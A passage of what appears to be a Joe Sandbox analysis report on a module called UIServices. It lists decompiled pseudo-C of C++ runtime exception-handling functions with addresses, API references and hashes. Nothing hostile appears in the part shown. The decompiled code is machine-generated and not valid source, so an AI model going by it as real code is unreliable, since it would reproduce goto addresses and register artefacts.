                                                    				if (_t136 +  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) + 8)) == 0) goto 0x23564012;
                                                    				 *(_t179 + 0x38) =  *(_t179 + 0xd8) & 0x000000ff;
                                                    				 *((long long*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xd0));
                                                    				 *((intOrPtr*)(_t179 + 0x28)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                    				 *(_t179 + 0x20) = _t171;
                                                    				 *0x235701a0(_t170);
                                                    				goto 0x23564050;
                                                    				 *(_t179 + 0x38) =  *((intOrPtr*)(_t179 + 0xd0));
                                                    				 *((intOrPtr*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                    				 *((char*)(_t179 + 0x28)) =  *(_t179 + 0xd8);
                                                    				 *(_t179 + 0x20) = _t171;
                                                    				E00007FFC7FFC23562F2C(_t141, _t195, 0x7ffc23560000, _t176);
                                                    				return 1;
                                                    			}























                                                    0x7ffc23563de4
                                                    0x7ffc23563de4
                                                    0x7ffc23563de9
                                                    0x7ffc23563dee
                                                    0x7ffc23563df8
                                                    0x7ffc23563dff
                                                    0x7ffc23563e02
                                                    0x7ffc23563e0b
                                                    0x7ffc23563e0e
                                                    0x7ffc23563e13
                                                    0x7ffc23563e18
                                                    0x7ffc23563e22
                                                    0x7ffc23563e28
                                                    0x7ffc23563e31
                                                    0x7ffc23563e39
                                                    0x7ffc23563e3e
                                                    0x7ffc23563e44
                                                    0x7ffc23563e4e
                                                    0x7ffc23563e53
                                                    0x7ffc23563e58
                                                    0x7ffc23563e62
                                                    0x7ffc23563e6b
                                                    0x7ffc23563ea1
                                                    0x7ffc23563eae
                                                    0x7ffc23563eb8
                                                    0x7ffc23563ec1
                                                    0x7ffc23563eca
                                                    0x7ffc23563ecd
                                                    0x7ffc23563ed2
                                                    0x7ffc23563ed8
                                                    0x7ffc23563ee1
                                                    0x7ffc23563f08
                                                    0x7ffc23563f0d
                                                    0x7ffc23563f0f
                                                    0x7ffc23563f18
                                                    0x7ffc23563f1d
                                                    0x7ffc23563f25
                                                    0x7ffc23563f27
                                                    0x7ffc23563f2f
                                                    0x7ffc23563f5b
                                                    0x7ffc23563f61
                                                    0x7ffc23563f63
                                                    0x7ffc23563f69
                                                    0x7ffc23563f73
                                                    0x7ffc23563f78
                                                    0x7ffc23563f89
                                                    0x7ffc23563f92
                                                    0x7ffc23563f97
                                                    0x7ffc23563fa3
                                                    0x7ffc23563fa9
                                                    0x7ffc23563fb2
                                                    0x7ffc23563fb4
                                                    0x7ffc23563fbb
                                                    0x7ffc23563fbd
                                                    0x7ffc23563fd0
                                                    0x7ffc23563fdd
                                                    0x7ffc23563fef
                                                    0x7ffc23563ffe
                                                    0x7ffc23564005
                                                    0x7ffc2356400a
                                                    0x7ffc23564010
                                                    0x7ffc2356401d
                                                    0x7ffc2356402f
                                                    0x7ffc2356403d
                                                    0x7ffc23564041
                                                    0x7ffc23564046
                                                    0x7ffc2356406c

                                                    APIs
                                                      • Part of subcall function 00007FFC235664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC235620FE), ref: 00007FFC235664BE
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC23563F63
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort
                                                    • String ID: $csm$csm
                                                    • API String ID: 4206212132-1512788406
                                                    • Opcode ID: b2e7f24d3f4019f58ad6359e40fd20a52bbceefe3fddcea22dc20a17f2dda2c5
                                                    • Instruction ID: 18baad9208cdba2bf46da37b856f8c5bf72343edf10eff0bd6190e7a12ae44f6
                                                    • Opcode Fuzzy Hash: b2e7f24d3f4019f58ad6359e40fd20a52bbceefe3fddcea22dc20a17f2dda2c5
                                                    • Instruction Fuzzy Hash: 5071D272F086A586DB608F25D88037DBBA0FB41F98F048175EE9D67A99CB3CD491CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC23563BBC(void* __ecx, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, long long __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                    				signed int _v32;
                                                    				long long _v40;
                                                    				char _v48;
                                                    				signed int* _v56;
                                                    				void* _t55;
                                                    				intOrPtr _t60;
                                                    				signed int _t101;
                                                    				void* _t109;
                                                    				intOrPtr _t111;
                                                    				signed int* _t116;
                                                    				intOrPtr* _t136;
                                                    				long long _t139;
                                                    				long long _t142;
                                                    				void* _t144;
                                                    				void* _t158;
                                                    				long long _t159;
                                                    
                                                    				_t109 = _t144;
                                                    				 *((long long*)(_t109 + 8)) = __rbx;
                                                    				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                    				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                    				_t136 = __rcx;
                                                    				_t139 = __r9;
                                                    				_t159 = __r8;
                                                    				_t142 = __rdx;
                                                    				E00007FFC7FFC23561894(_t55, __r8);
                                                    				E00007FFC7FFC235664B0(_t109);
                                                    				_t116 = _a40;
                                                    				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x23563c3e;
                                                    				if ( *__rcx == 0xe06d7363) goto 0x23563c3e;
                                                    				if ( *__rcx != 0x80000029) goto 0x23563c22;
                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x23563c26;
                                                    				goto 0x23563c24;
                                                    				if ( *__rcx == 0x80000026) goto 0x23563c3e;
                                                    				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x23563c3e;
                                                    				if ((_t116[9] & 0x00000001) != 0) goto 0x23563dc4;
                                                    				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x23563ccd;
                                                    				if (_t116[1] == 0) goto 0x23563dc4;
                                                    				if (_a48 != 0) goto 0x23563dc4;
                                                    				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x23563cba;
                                                    				if ( *__rcx != 0x80000026) goto 0x23563c99;
                                                    				_t60 = E00007FFC7FFC2356E1E8(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                    				if (_t60 - 0xffffffff < 0) goto 0x23563cb3;
                                                    				if (_t60 - _t116[1] >= 0) goto 0x23563cb3;
                                                    				r9d = _t60;
                                                    				E00007FFC7FFC23564940(_t109, _t142, __r9, _t116);
                                                    				goto 0x23563dc4;
                                                    				if ( *_t136 != 0x80000029) goto 0x23563cba;
                                                    				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                    				if (r9d - 0xffffffff < 0) goto 0x23563cb3;
                                                    				if (r9d - _t116[1] >= 0) goto 0x23563cb3;
                                                    				goto 0x23563c89;
                                                    				abort();
                                                    				asm("int3");
                                                    				E00007FFC7FFC2356E7A0(0x80000029, r9d - _t116[1], _t109, _t116, __r9, __r9, _t116);
                                                    				goto 0x23563dc4;
                                                    				if (_t116[3] != 0) goto 0x23563d15;
                                                    				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0x23563cf5;
                                                    				_t101 = _t116[8];
                                                    				if (_t101 == 0) goto 0x23563cf5;
                                                    				E00007FFC7FFC2356F044(_t109);
                                                    				if (_t101 != 0) goto 0x23563d15;
                                                    				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x23563dc4;
                                                    				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0x23563dc4;
                                                    				if ( *_t136 != 0xe06d7363) goto 0x23563d8b;
                                                    				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x23563d8b;
                                                    				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x23563d8b;
                                                    				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                    				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x23563d8b;
                                                    				E00007FFC7FFC2356F058(_t111);
                                                    				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x23563d8b;
                                                    				_v32 = _a64 & 0x000000ff;
                                                    				_v40 = _a56;
                                                    				_v48 = _a48;
                                                    				_v56 = _t116;
                                                    				 *0x235701a0(_t158);
                                                    				goto 0x23563dc9;
                                                    				_v32 = _a56;
                                                    				_v40 = _a48;
                                                    				_v48 = _a64;
                                                    				_v56 = _t116;
                                                    				E00007FFC7FFC23562A44(_a48, _t136, _t142, _t159, _t139);
                                                    				return 1;
                                                    			}



















                                                    0x7ffc23563bbc
                                                    0x7ffc23563bbf
                                                    0x7ffc23563bc3
                                                    0x7ffc23563bc7
                                                    0x7ffc23563bcb
                                                    0x7ffc23563bd5
                                                    0x7ffc23563bd8
                                                    0x7ffc23563bde
                                                    0x7ffc23563be1
                                                    0x7ffc23563be4
                                                    0x7ffc23563be9
                                                    0x7ffc23563bee
                                                    0x7ffc23563c04
                                                    0x7ffc23563c0c
                                                    0x7ffc23563c10
                                                    0x7ffc23563c16
                                                    0x7ffc23563c20
                                                    0x7ffc23563c24
                                                    0x7ffc23563c32
                                                    0x7ffc23563c38
                                                    0x7ffc23563c42
                                                    0x7ffc23563c4c
                                                    0x7ffc23563c5a
                                                    0x7ffc23563c64
                                                    0x7ffc23563c68
                                                    0x7ffc23563c74
                                                    0x7ffc23563c7c
                                                    0x7ffc23563c81
                                                    0x7ffc23563c83
                                                    0x7ffc23563c8f
                                                    0x7ffc23563c94
                                                    0x7ffc23563c9b
                                                    0x7ffc23563c9d
                                                    0x7ffc23563ca5
                                                    0x7ffc23563cab
                                                    0x7ffc23563cb1
                                                    0x7ffc23563cb3
                                                    0x7ffc23563cb9
                                                    0x7ffc23563cc3
                                                    0x7ffc23563cc8
                                                    0x7ffc23563cd1
                                                    0x7ffc23563cdf
                                                    0x7ffc23563ce1
                                                    0x7ffc23563ce5
                                                    0x7ffc23563ce7
                                                    0x7ffc23563cf3
                                                    0x7ffc23563d01
                                                    0x7ffc23563d0f
                                                    0x7ffc23563d1b
                                                    0x7ffc23563d21
                                                    0x7ffc23563d2a
                                                    0x7ffc23563d2c
                                                    0x7ffc23563d34
                                                    0x7ffc23563d36
                                                    0x7ffc23563d49
                                                    0x7ffc23563d56
                                                    0x7ffc23563d68
                                                    0x7ffc23563d77
                                                    0x7ffc23563d7e
                                                    0x7ffc23563d83
                                                    0x7ffc23563d89
                                                    0x7ffc23563d96
                                                    0x7ffc23563da8
                                                    0x7ffc23563db6
                                                    0x7ffc23563dba
                                                    0x7ffc23563dbf
                                                    0x7ffc23563de3

                                                    APIs
                                                      • Part of subcall function 00007FFC235664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC235620FE), ref: 00007FFC235664BE
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC23563CB3
                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFC23563CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                    • String ID: csm$csm
                                                    • API String ID: 4108983575-3733052814
                                                    • Opcode ID: b717ccaecdb6391517578402c220b2ef0acb83a282a33f9b871b2d762923a3fa
                                                    • Instruction ID: b9cc9e3155ef51204b71265534ea5d7069930ffea079d1d17cff72ecc856e219
                                                    • Opcode Fuzzy Hash: b717ccaecdb6391517578402c220b2ef0acb83a282a33f9b871b2d762923a3fa
                                                    • Instruction Fuzzy Hash: FF517E32F0869A86EB648F25D94426877A0FF50B94F144175EAAD67BE6CF3CE450CF10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00007FFC7FFC2356A314(void* __edx, long long __rbx, long long* __rcx, long long __rsi, void* __r10, long long _a16, long long _a24) {
                                                    				void* _v8;
                                                    				signed int _v24;
                                                    				char _v104;
                                                    				intOrPtr _v112;
                                                    				char _v120;
                                                    				signed int _t23;
                                                    				void* _t26;
                                                    				void* _t31;
                                                    				signed long long _t40;
                                                    				signed int* _t44;
                                                    				long long* _t49;
                                                    				char* _t52;
                                                    				void* _t64;
                                                    				void* _t68;
                                                    
                                                    				_a16 = __rbx;
                                                    				_a24 = __rsi;
                                                    				_t40 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				_v24 = _t40 ^ _t64 - 0x00000090;
                                                    				_t49 = __rcx;
                                                    				_t52 =  *0x23574360; // 0x0
                                                    				_t31 = __edx;
                                                    				if ( *_t52 != sil) goto 0x2356a35d;
                                                    				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                    				 *__rcx = 0x23571ac0;
                                                    				goto 0x2356a40b;
                                                    				if ( *_t52 - 0x30 - 9 > 0) goto 0x2356a385;
                                                    				 *0x23574360 = _t52 + 1;
                                                    				E00007FFC7FFC23566E4C( *_t52 - 0x2f, __rcx,  *_t52 - 0x2f, __r10);
                                                    				goto 0x2356a40b;
                                                    				E00007FFC7FFC2356D614(_t26,  &_v120,  *_t52 - 0x2f);
                                                    				if (_v112 == sil) goto 0x2356a3e8;
                                                    				if (_t31 != 0x42) goto 0x2356a3d8;
                                                    				asm("movsd xmm3, [esp+0x20]");
                                                    				asm("dec cx");
                                                    				E00007FFC7FFC2356E094(_t26, _v120,  &_v104,  *_t52 - 0x2f, "%lf", _t68);
                                                    				r8b = sil;
                                                    				_t23 = E00007FFC7FFC235669EC(_t49,  &_v104);
                                                    				goto 0x2356a40b;
                                                    				if (_t31 != 0x41) goto 0x2356a3e8;
                                                    				asm("movss xmm3, [esp+0x20]");
                                                    				asm("cvtps2pd xmm3, xmm3");
                                                    				goto 0x2356a3ab;
                                                    				_t44 =  *0x23574360; // 0x0
                                                    				_t46 =  !=  ? __rsi : 0x23571ac0;
                                                    				 *_t49 =  !=  ? __rsi : 0x23571ac0;
                                                    				asm("sbb eax, eax");
                                                    				 *(_t49 + 8) = _t23 & 0x00000002;
                                                    				return E00007FFC7FFC2356F5B0( ~( *_t44), _t49, _v24 ^ _t64 - 0x00000090,  &_v104);
                                                    			}

















                                                    0x7ffc2356a314
                                                    0x7ffc2356a319
                                                    0x7ffc2356a326
                                                    0x7ffc2356a330
                                                    0x7ffc2356a338
                                                    0x7ffc2356a33d
                                                    0x7ffc2356a344
                                                    0x7ffc2356a349
                                                    0x7ffc2356a352
                                                    0x7ffc2356a355
                                                    0x7ffc2356a358
                                                    0x7ffc2356a363
                                                    0x7ffc2356a36e
                                                    0x7ffc2356a37b
                                                    0x7ffc2356a380
                                                    0x7ffc2356a38a
                                                    0x7ffc2356a394
                                                    0x7ffc2356a3a3
                                                    0x7ffc2356a3a5
                                                    0x7ffc2356a3ab
                                                    0x7ffc2356a3c1
                                                    0x7ffc2356a3c6
                                                    0x7ffc2356a3d1
                                                    0x7ffc2356a3d6
                                                    0x7ffc2356a3db
                                                    0x7ffc2356a3dd
                                                    0x7ffc2356a3e3
                                                    0x7ffc2356a3e6
                                                    0x7ffc2356a3e8
                                                    0x7ffc2356a3fa
                                                    0x7ffc2356a400
                                                    0x7ffc2356a403
                                                    0x7ffc2356a408
                                                    0x7ffc2356a432

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: NameName::
                                                    • String ID: %lf
                                                    • API String ID: 1333004437-2891890143
                                                    • Opcode ID: 41c30a5a5790bf6d49a00a2b2ac713d2c3ac894374eb1635645553ff8093d6db
                                                    • Instruction ID: 88db64602b3cabd146e9e64d26ce28af73ff42789df2bddc9525f7978b59bb72
                                                    • Opcode Fuzzy Hash: 41c30a5a5790bf6d49a00a2b2ac713d2c3ac894374eb1635645553ff8093d6db
                                                    • Instruction Fuzzy Hash: 9A318262F08BA985E620CF24EC5026977A4FB89B80F844172E99D67745CE3CD542CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E00007FFC7FFC23562160(void* __rax, long long __rbx, intOrPtr* __rcx, long long _a8) {
                                                    				long long _t25;
                                                    
                                                    				_a8 = __rbx;
                                                    				_t25 =  *((intOrPtr*)(__rcx));
                                                    				if ( *_t25 == 0xe0434352) goto 0x235621a5;
                                                    				if ( *_t25 == 0xe0434f4d) goto 0x235621a5;
                                                    				if ( *_t25 != 0xe06d7363) goto 0x235621b8;
                                                    				E00007FFC7FFC235664B0(__rax);
                                                    				 *((long long*)(__rax + 0x20)) = _t25;
                                                    				E00007FFC7FFC235664B0(__rax);
                                                    				 *((long long*)(__rax + 0x28)) =  *((intOrPtr*)(__rcx + 8));
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				E00007FFC7FFC235664B0(__rax);
                                                    				if ( *((intOrPtr*)(__rax + 0x30)) <= 0) goto 0x235621b8;
                                                    				E00007FFC7FFC235664B0(__rax);
                                                    				 *((intOrPtr*)(__rax + 0x30)) =  *((intOrPtr*)(__rax + 0x30)) - 1;
                                                    				return 0;
                                                    			}




                                                    0x7ffc23562160
                                                    0x7ffc2356216a
                                                    0x7ffc23562176
                                                    0x7ffc2356217e
                                                    0x7ffc23562186
                                                    0x7ffc23562188
                                                    0x7ffc2356218d
                                                    0x7ffc23562195
                                                    0x7ffc2356219a
                                                    0x7ffc2356219e
                                                    0x7ffc235621a4
                                                    0x7ffc235621a5
                                                    0x7ffc235621ae
                                                    0x7ffc235621b0
                                                    0x7ffc235621b5
                                                    0x7ffc235621c4

                                                    APIs
                                                      • Part of subcall function 00007FFC235664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC235620FE), ref: 00007FFC235664BE
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC2356219E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abortterminate
                                                    • String ID: MOC$RCC$csm
                                                    • API String ID: 661698970-2671469338
                                                    • Opcode ID: 9c7fbf4e887644f7275f1c9a96d92e35e353b5974a4e60fd92a878f094656d0a
                                                    • Instruction ID: 0592d0e1aeb0f037a7c6c344b3d3cc1be07b257d62b92c2dd37aa2f301d24405
                                                    • Opcode Fuzzy Hash: 9c7fbf4e887644f7275f1c9a96d92e35e353b5974a4e60fd92a878f094656d0a
                                                    • Instruction Fuzzy Hash: 18F04F32E1C66AC6E7505B61EA8116C36B4EF88B86F0990B1D74C16356CF3CD490CE91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00007FFC7FFC2356E0F0(void* __rax, long long __rbx, long long __rcx, long long __r8, long long _a8) {
                                                    				void* _t8;
                                                    				void* _t10;
                                                    				void* _t11;
                                                    				void* _t20;
                                                    				void* _t22;
                                                    				void* _t27;
                                                    
                                                    				_a8 = __rbx;
                                                    				_t8 = E00007FFC7FFC2356E340(_t11, __rax, __rcx, __rcx, _t20, _t22, __r8, _t27);
                                                    				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x2356e131;
                                                    				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x2356e131;
                                                    				if (_t8 != 1) goto 0x2356e131;
                                                    				E00007FFC7FFC235664B0(__rax);
                                                    				 *((long long*)(__rax + 0x20)) = __rcx;
                                                    				_t10 = E00007FFC7FFC235664B0(__rax);
                                                    				 *((long long*)(__rax + 0x28)) = __r8;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				return _t10;
                                                    			}









                                                    0x7ffc2356e0f0
                                                    0x7ffc2356e100
                                                    0x7ffc2356e109
                                                    0x7ffc2356e111
                                                    0x7ffc2356e116
                                                    0x7ffc2356e118
                                                    0x7ffc2356e11d
                                                    0x7ffc2356e121
                                                    0x7ffc2356e126
                                                    0x7ffc2356e12a
                                                    0x7ffc2356e130
                                                    0x7ffc2356e13b

                                                    APIs
                                                    • __C_specific_handler.LIBVCRUNTIME ref: 00007FFC2356E100
                                                      • Part of subcall function 00007FFC2356E340: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFC2356E400
                                                      • Part of subcall function 00007FFC2356E340: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFC2356E105), ref: 00007FFC2356E44F
                                                      • Part of subcall function 00007FFC235664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC235620FE), ref: 00007FFC235664BE
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC2356E12A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                    • String ID: csm$f
                                                    • API String ID: 2451123448-629598281
                                                    • Opcode ID: 1e7ca610bb810251593f1952af4b90bc85378ad400c43371b1f1c08f831b31bb
                                                    • Instruction ID: 1443b9f8d7788b6ee0eedafe4c9b8e1832f59ed08d50a2839af457633c6653f7
                                                    • Opcode Fuzzy Hash: 1e7ca610bb810251593f1952af4b90bc85378ad400c43371b1f1c08f831b31bb
                                                    • Instruction Fuzzy Hash: 47E06531F092AA81E7606B21BA8013D66A8EF55F55F1480B4DB8C1674ACE3DD894CA51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E00007FFC7FFC235698C8(void* __edi, void* __eflags, void* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, long long __r12, long long _a8, long long _a16, long long _a24) {
                                                    				void* _v24;
                                                    				char _v56;
                                                    				char _v72;
                                                    				signed int _v80;
                                                    				signed long long _v88;
                                                    				signed long long _v96;
                                                    				char _v104;
                                                    				signed int _v112;
                                                    				char _v120;
                                                    				signed int _t70;
                                                    				void* _t85;
                                                    				void* _t86;
                                                    				signed int _t96;
                                                    				signed int _t98;
                                                    				signed int _t99;
                                                    				signed long long _t106;
                                                    				intOrPtr* _t126;
                                                    				intOrPtr* _t127;
                                                    				long long _t129;
                                                    				long long _t130;
                                                    				signed char* _t131;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr* _t134;
                                                    				char* _t135;
                                                    				signed long long* _t139;
                                                    				void* _t175;
                                                    				void* _t176;
                                                    				signed long long _t180;
                                                    				long long _t182;
                                                    
                                                    				_t178 = __r12;
                                                    				_t170 = __r8;
                                                    				_t164 = __rsi;
                                                    				_t163 = __rdi;
                                                    				_t155 = __rdx;
                                                    				_t95 = __edi;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __r12;
                                                    				_t139 = __rcx;
                                                    				 *0x23574384 =  *0x23574384 + 1;
                                                    				_t70 =  *0x23574370; // 0x0
                                                    				asm("bt eax, 0xd");
                                                    				if (__eflags >= 0) goto 0x2356992a;
                                                    				asm("btr eax, 0xd");
                                                    				 *0x23574370 = _t70;
                                                    				E00007FFC7FFC235697B4(0, __edi, __eflags, __rax, __rcx,  &_v104, __rdx, __rdi, __rsi, __r8);
                                                    				asm("bts dword [0xaa58], 0xd");
                                                    				 *_t139 = _v104;
                                                    				_t139[1] = _v96;
                                                    				goto 0x23569b86;
                                                    				_t126 =  *0x23574360; // 0x0
                                                    				if ( *_t126 != 0x3f) goto 0x23569b6a;
                                                    				_t127 = _t126 + 1;
                                                    				 *0x23574360 = _t127;
                                                    				if ( *_t127 != 0x3f) goto 0x2356999a;
                                                    				if ( *((intOrPtr*)(_t127 + 1)) != 0x3f) goto 0x23569975;
                                                    				E00007FFC7FFC235698C8(__edi,  *((intOrPtr*)(_t127 + 1)) - 0x3f, _t127 + 1, _t139,  &_v104, _t155, __rdi, __rsi, _t170, __r12);
                                                    				_t129 =  *0x23574360; // 0x0
                                                    				goto 0x2356996e;
                                                    				_t130 = _t129 + 1;
                                                    				 *0x23574360 = _t130;
                                                    				if ( *_t130 != 0) goto 0x23569964;
                                                    				goto 0x23569918;
                                                    				if ( *_t130 != 0x24) goto 0x23569987;
                                                    				E00007FFC7FFC2356C838(_t86,  *_t126, 1, __edi, _t139,  &_v120, _t155, __rdi, _t164);
                                                    				goto 0x235699a8;
                                                    				 *0x23574360 = _t130;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC2356ABE0(0, __edi, _t139,  &_v120, _t163, _t164, _t170, _t178);
                                                    				goto 0x235699a8;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC2356DA5C(_t86,  *_t126, 1, _t95, _t139,  &_v120, _t163, _t164, _t170, _t175, _t176);
                                                    				_t96 = _v112;
                                                    				_t180 = _v120;
                                                    				_t106 = _t180;
                                                    				if (_t106 == 0) goto 0x235699c2;
                                                    				asm("bt esi, 0x9");
                                                    				if (_t106 >= 0) goto 0x235699c2;
                                                    				r12d = 1;
                                                    				goto 0x235699c5;
                                                    				r12d = 0;
                                                    				r15d = _t96;
                                                    				r15d = r15d >> 0xf;
                                                    				r15d = r15d & 0x00000001;
                                                    				if (_v112 - 1 <= 0) goto 0x235699e1;
                                                    				 *_t139 = _t180;
                                                    				_t139[1] = _t96;
                                                    				goto 0x23569b86;
                                                    				_t131 =  *0x23574360; // 0x0
                                                    				if (( *_t131 & 0x000000bf) == 0) goto 0x23569ad4;
                                                    				E00007FFC7FFC2356BC80(_t95, _t139,  &_v104, _t163, _t164, _t175, _t176, _t178);
                                                    				if (_v104 == 0) goto 0x23569ad4;
                                                    				if ( *0x23574374 == 0) goto 0x23569a8b;
                                                    				 *0x23574374 = 0;
                                                    				E00007FFC7FFC23566F74( &_v120,  &_v88,  &_v104);
                                                    				_v120 =  *_t131;
                                                    				_v112 = _t131[8];
